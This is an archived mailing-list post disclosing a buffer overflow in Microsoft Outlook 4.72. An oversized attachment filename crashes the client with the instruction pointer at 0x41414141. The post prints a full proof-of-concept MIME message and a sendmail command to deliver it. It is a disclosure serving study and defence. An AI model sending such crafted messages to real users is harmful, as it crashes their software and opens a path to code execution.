One of the Outlook overflows

• Previous message: Brett Glass: "procmail workaround for MIME filename overflow exploit"
• Next in thread: Phillip R. Jaenke: "Re: One of the Outlook overflows"
• Reply: Phillip R. Jaenke: "Re: One of the Outlook overflows"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

There have been a few posts about overflows in MS Outlook, but they have
not told exactly where in the message the overflow exists.  I have found
one of them, within the description of an attachment.  If the filename
given is very large, it makes Outlook crash.  I tried this on Outlook
v4.72.2106.4 on NT 4.0, and on win95.  In both cases it reported an error
at address 0x41414141 (41 == hex A).  Here is the message that caused the
errors:

--------------------------- START HERE --------------------------------

From: <From address here>
To: <To address here>
Subject: test
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

------------------------ END HERE --------------------------------------

To send the message, save it to a file, set the to: and from:, and run
"sendmail -t < fileyousaved"

It causes Outlook to crash when the user attempts to open or save the
file.  According to a previous post, there are many of these overflows in
the attachment discriptors.  This one requires the user to open the
attachment, but similar overflows may not.

Ryan

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQBtAzWOgPAAAAEDAMLNosknbxL/d/a4xhdleyF1VFAtN7qV0qr88TePfp4D/otw
10dkld3jy09kU1V/KvStWDyVEqX9KWZWholg2YkGupoRvJIUMgRgkpryKzjfbYIg
c4wCPs0kU4Bp8hvUzQAFEbQdUnlhbiBWZWV0eSA8cnlhbkByeWFuc3BjLmNvbT6J
AHUDBRA1joDwJFOAafIb1M0BAVvpAwCBVdN6XNj4JKxFb9/zz1+Lq9HzFSrxW/9S
S+rWDxUU2Yirtp/TM9bxyj4Q4siIUwwlWkS0Mq3uCxss6hw65m2dqX2hlZDsE2Es
lvzSliBaQRGPlWz9z26jtCZgxM5BliQ=
=7G/D
-----END PGP PUBLIC KEY BLOCK-----

• Next message: Matt Rose: "Re: Object tag crashes Internet Explorer 4.0"
• Previous message: Brett Glass: "procmail workaround for MIME filename overflow exploit"
• Next in thread: Phillip R. Jaenke: "Re: One of the Outlook overflows"
• Reply: Phillip R. Jaenke: "Re: One of the Outlook overflows"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:10:11 PDT